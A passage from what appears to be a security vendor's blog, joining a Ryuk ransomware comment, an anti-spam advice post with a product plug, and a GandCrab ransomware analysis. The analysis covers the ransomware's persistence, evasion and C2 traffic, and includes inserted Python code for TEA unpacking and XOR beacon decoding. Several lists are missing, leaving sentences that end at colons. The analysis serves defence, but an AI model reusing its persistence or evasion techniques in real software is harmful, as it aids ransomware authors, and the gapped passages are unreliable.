Ryuk is also ready to exploit really legacy Windows systems, such as Windows 2000 32-bit. What is an OS that’s been out of support for so long doing on the internet? Or maybe those machines are just in an organization’s internal network, but the Ryuk black hats must have gotten into their targets’ internal networks through a machine that is connected to the internet. Any computer that runs an OS that’s no longer supported should be completely isolated from the internet, or exist as a virtual machine (that a network administrator can delete at will) if using that OS/version can’t possibly be avoided.

Ryuk also has a really nasty persistence technique. It just writes itself to the Run registry key. Ouch!

Only time will tell if Ryuk is the work of North Korea’s notorious Lazarus Group, or if we’re looking at the work of Lazarus Part Deux. The LulzSec to Lazarus’ Anonymous, if you will. (Well, not only time will tell, but also the work of dedicated malware researchers like the Comodo threat intelligence lab.)


Anti-spam Filtering Techniques

Antispam solutions can be of great use if you or your business is experiencing huge volumes of spam emails. With the Internet becoming the dominant platform for businesses to reach out to the customers, unsolicited bulk email aka spam has reached epidemic proportions.

As more and more digital marketers turn to bulk email as a viable means of reaching potential customers, this trend of sending unsolicited bulk emails will continue to rise.

Spam has become quite an annoyance, affecting individuals and businesses alike. Usually, malware attacks caused by viruses, worms, adware and Trojan horses catch people’s attention, but spam is arguably a more serious security threat. This is because spam affects every Internet user (directly or indirectly), and there is no solution to spam as effective as antivirus software is against malware. Antispam solutions come in handy in such scenarios.

With a proactive Anti-spam solution, spam emails sent by unknown senders can be filtered out effectively. It saves a lot of time which would have been wasted in determining and disposing of the unwanted spam e-mails.

Currently, there exists a wide range of countermeasures to deal with spam emails. Let us discuss in detail some of the most effective spam filtering techniques for managing this ever-increasing problem.

Spam Filtering by Content

The most commonly used technique to block spam is filtering on common words found in spam emails. Some of the most common spam words include “additional income”, “cash bonus” and claims that you are a winner. You can filter out emails containing such words or covering such topics.

Blacklisting Certain IPs

Another commonly used spam filtering technique is blacklisting certain IP addresses that are known to be used by spammers. This way, you can prevent spam emails from those IPs.

Avoid Posting Your Email ID Publicly on the Internet

Avoid posting your real email address on public lists and forums if you don’t have to. This way you can prevent spammers from harvesting your address and selling it on to other spammers (email harvesting).

If you want to post your real email address on a website or something similar, insert extra spaces or, preferably, replace the @ symbol in your email with (at). Avoid posting your entire email ID in the exact form a mail client would use to send a message. This will reduce the chance of spambots finding your real email ID online.

Use Contact Forms

If you are running a business, you can use contact forms on your website instead of publishing your real email ID. This may be your best option for reducing the amount of spam you get. Users won’t see your email ID; instead they fill out the form in the web browser, which sends that information to your email address.

Use an Effective Antispam Solution

Antispam solutions such as Comodo Dome Antispam will stop spam emails even before they reach your inbox. Apart from automatically quarantining spam emails, there are many other benefits associated with using an antispam solution: it produces a limited number of false positives, filters 99.9% of spam from reaching your inbox, and so on.

If you are in search of a good anti-spam solution for your company, look no further: get Comodo Dome Anti-spam today!

In The Crab’s Claws: The New Version Of Ransomware Hits Everyone But Russians

There is no such thing as good malware

The arms race between cybercriminals and cybersecurity defenders is accelerating at an enormous speed. Malware authors react immediately to any detected and neutralized malware with new, more sophisticated samples designed to bypass the latest antimalware products. GandCrab is a clear example of such new-generation malware.

First discovered in January 2018, this sophisticated, cunning and constantly changing ransomware already has four versions that differ significantly from one another. The cybercriminals kept adding new features for stronger encryption and detection evasion. The latest sample Comodo malware analysts discovered has something brand-new: it utilizes the Tiny Encryption Algorithm (TEA) to avoid detection.

Analyzing GandCrab is useful not merely as an exploration of one particular new malware family, even though some researchers called it the “New King of ransomware”. It’s a clear example of how modern malware readjusts to a changing cybersecurity environment. So, let’s go deeper into GandCrab’s evolution.

The history

GandCrab v1

The first version of GandCrab, discovered in January 2018, encrypted users’ files with a unique key and extorted a ransom in the DASH cryptocurrency. This version was distributed via exploit kits such as RIG EK and GrandSoft EK. The ransomware copied itself into the “%appdata%\Microsoft” folder and injected itself into the system process nslookup.exe.

It made an initial connection to to find out the public IP of the infected machine, and then ran the nslookup process to connect to the domain gandcrab.bit, which uses the “.bit” top-level domain.

This version quickly spread across the Internet, but its triumph was stopped at the end of February: a decryptor was created and placed online, letting victims decrypt their files without paying a ransom to the perpetrators.

GandCrab v2

The cybercriminals were not slow to respond: within a week, GandCrab version 2 hit users. It had a new encryption algorithm that made the decryptor useless. Encrypted files got the .CRAB extension, and the hardcoded domains changed to ransomware.bit and zonealarm.bit. This version was propagated via spam emails in March.

GandCrab v3

The next version came out in April with a new ability to change the victim’s desktop wallpaper to a ransom note. Constant switching between the desktop and the ransom banner was clearly meant to exert more psychological pressure on the victims. Another new feature was a RunOnce autorun registry key:

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\whtsxydcvmt = C:\Documents and Settings\Administrator\Application Data\Microsoft\yrtbsc.exe

Reflective Loader DLL injection starts the malicious activity

GandCrab v4

Finally, the fourth version, GandCrab v4, came out in July with a variety of significant updates, including a new encryption algorithm. As a Comodo analyst discovered, the malware now uses the Tiny Encryption Algorithm (TEA) to avoid detection. TEA is one of the fastest and most efficient symmetric ciphers, developed by David Wheeler and Roger Needham.

Also, all encrypted files now get the extension .KRAB instead of .CRAB.

In addition, the cybercriminals changed how the ransomware is distributed. It’s now spread through fake software crack sites. Once a user downloads and runs such a fake crack, the ransomware is dropped onto the computer.

Here is an example of such a fake software crack: Crack_Merging_Image_to_PDF.exe is, in reality, GandCrab v4.

Let’s see in detail what happens when a user runs this file.

Under the hood

As mentioned above, the GandCrab ransomware uses the strong and fast TEA encryption algorithm to avoid detection. Its decryption routine recovers the plain GandCrab file from the packed one.

The Decryption Routine Function

After the decryption is complete, the original GandCrab v4 file is dropped and run, beginning its destructive raid.
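To make the unpacking step concrete, here is the standard TEA cipher (Wheeler and Needham, 32 rounds) as an analyst would implement it to recover a TEA-protected payload and check that the result is a PE file. This is an added example, not the malware’s or Comodo’s code: the real loader’s key, block mode and byte order are not given in the write-up, so a placeholder key, little-endian words and plain ECB over 8-byte blocks are assumed.

```python
# TEA (Wheeler & Needham) as an analyst would use it to unpack a TEA-protected payload.
# Added example: the real loader's key, mode and byte order are not in the write-up,
# so little-endian words and plain ECB over 8-byte blocks are assumed.
import struct

DELTA, MASK, ROUNDS = 0x9E3779B9, 0xFFFFFFFF, 32

def _encrypt_block(v0, v1, k):
    s = 0
    for _ in range(ROUNDS):
        s = (s + DELTA) & MASK
        v0 = (v0 + (((v1 << 4) + k[0]) ^ (v1 + s) ^ ((v1 >> 5) + k[1]))) & MASK
        v1 = (v1 + (((v0 << 4) + k[2]) ^ (v0 + s) ^ ((v0 >> 5) + k[3]))) & MASK
    return v0, v1

def _decrypt_block(v0, v1, k):
    s = (DELTA * ROUNDS) & MASK  # value of the round sum after the last encrypt round
    for _ in range(ROUNDS):
        v1 = (v1 - (((v0 << 4) + k[2]) ^ (v0 + s) ^ ((v0 >> 5) + k[3]))) & MASK
        v0 = (v0 - (((v1 << 4) + k[0]) ^ (v1 + s) ^ ((v1 >> 5) + k[1]))) & MASK
        s = (s - DELTA) & MASK
    return v0, v1

def _run(data: bytes, key: bytes, block_fn) -> bytes:
    """Apply block_fn to every 8-byte block, with the 128-bit key split into 4 words."""
    if len(key) != 16:
        raise ValueError("TEA uses a 128-bit key")
    if len(data) % 8:
        raise ValueError("data length must be a multiple of 8 bytes")
    k = struct.unpack("<4I", key)
    out = bytearray()
    for i in range(0, len(data), 8):
        out += struct.pack("<2I", *block_fn(*struct.unpack("<2I", data[i:i + 8]), k))
    return bytes(out)

def tea_encrypt(data: bytes, key: bytes) -> bytes:
    """Zero-pad to a block boundary, then encrypt block by block (ECB)."""
    return _run(data + b"\x00" * (-len(data) % 8), key, _encrypt_block)

def tea_decrypt(data: bytes, key: bytes) -> bytes:
    return _run(data, key, _decrypt_block)

def looks_like_pe(data: bytes) -> bool:
    """Sanity check after unpacking: a Windows executable starts with 'MZ'."""
    return data[:2] == b"MZ"

# Constructed stand-in for the packed GandCrab file (an MZ stub, not a real PE) and a
# placeholder key; neither value comes from the malware.
FAKE_PAYLOAD = b"MZ" + b"\x90" * 30
FAKE_KEY = b"0123456789abcdef"
```

In practice the key is read out of the loader (here the crack executable) during analysis; once `looks_like_pe` is true on the decrypted buffer, the unpacked sample can be written to disk for further static analysis.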

Firstly, the ransomware checks for the following processes with the CreateToolhelp32Snapshot API and terminates any of them that are running:

Then the ransomware checks the keyboard layout. If it turns out to be Russian, GandCrab terminates execution immediately.

Generating URL Process

Notably, GandCrab uses a specific randomized algorithm to generate a URL for each host. This algorithm is based on the following pattern:


The malware consistently creates all elements of the pattern, resulting in a unique URL.

The URL created by the malware can be seen in the right column.

Information Gathering

GandCrab collects the following information from the infected machine:

Then it checks for a running antivirus…

… and gathers information about the system. After that, it encrypts all the collected information with XOR and sends it to the command-and-control server. Notably, the encryption key is the string “jopochlen”, which is an obscenity in Russian. That’s one more clear sign of the malware’s Russian origin.
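The XOR step above is a repeating-key XOR, which is reversible with the same key and, because the key is static, recoverable from a captured beacon once a few bytes of its plaintext can be guessed. The following is an added example (not code from the malware or from Comodo) that an analyst could use to decode such traffic; the beacon layout and field names are constructed, only the key string comes from the analysis.

```python
# Repeating-key XOR as used to obfuscate the C2 beacon, plus known-plaintext key
# recovery. Added example; the beacon layout below is constructed, not GandCrab's.

XOR_KEY = b"jopochlen"  # key string reported in the analysis

def xor_crypt(data: bytes, key: bytes) -> bytes:
    """XOR each byte with the repeating key; the same call encrypts and decrypts."""
    if not key:
        raise ValueError("key must not be empty")
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

def recover_key(ciphertext: bytes, known_prefix: bytes, key_len: int) -> bytes:
    """Recover the key from a captured beacon whose first key_len plaintext bytes
    are known (e.g. a fixed field name): cipher ^ plain == key[i % key_len]."""
    if len(known_prefix) < key_len or len(ciphertext) < key_len:
        raise ValueError("need at least key_len bytes of known plaintext and ciphertext")
    return bytes(c ^ p for c, p in zip(ciphertext[:key_len], known_prefix[:key_len]))

# Constructed beacon: what a host-profile blob might look like (layout is assumed).
SAMPLE_BEACON = b"pc_user=alice&pc_name=WS01&av=none&lang=en_US"

def decode_captured(ciphertext: bytes, known_prefix: bytes) -> bytes:
    """Full analyst workflow: recover the key from the known prefix, then decode."""
    key = recover_key(ciphertext, known_prefix, len(XOR_KEY))
    return xor_crypt(ciphertext, key)
```

The same weakness is why a static XOR key is only obfuscation, not encryption: a defender who knows one field of the beacon format can decode every beacon from every infected host.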

Key Generation

The ransomware generates private and public keys using the Microsoft Cryptographic Provider and the following APIs:

Before starting the encryption process, the malware checks for some files…

… and folders to skip them during encryption:

These files and folders are necessary for the ransomware to function properly. After that, GandCrab begins encrypting the victim’s files.

The ransom

When the encryption is over, GandCrab opens the ransom note, a file named KRAB-DECRYPT.txt:

If the victim follows the perpetrators’ instructions and goes to their TOR site, she’ll find the ransom banner with a countdown:

The payment page contains detailed instructions on how to pay the ransom.

The Comodo cybersecurity research team has traced the IPs GandCrab communicates with. Below are the top ten countries from this IP list.

GandCrab hit users all over the world. Here is the list of the top ten countries affected by the malware.

“This finding of our analysts clearly demonstrates that malware swiftly changes and evolves in its rapidity of adaptation to cybersecurity vendors’ countermeasures”, comments Fatih Orhan, Head of Comodo Threat Research Labs. “Obviously, we are at the edge of the time when all processes in the cybersecurity field are intensely catalyzing. Malware is quickly growing not only in quantity but also in its ability to mimic instantly. In the Comodo Cybersecurity First Quarter 2018 Threat Report, we predicted that the downsizing of ransomware was just a redeployment of forces and that we’ll face updated and more complicated samples in the nearest future. The appearance of GandCrab clearly confirms and demonstrates this trend. Thus, the cybersecurity market should be ready to face upcoming waves of attacks loaded with brand-new ransomware types.”

Live secure with Comodo!
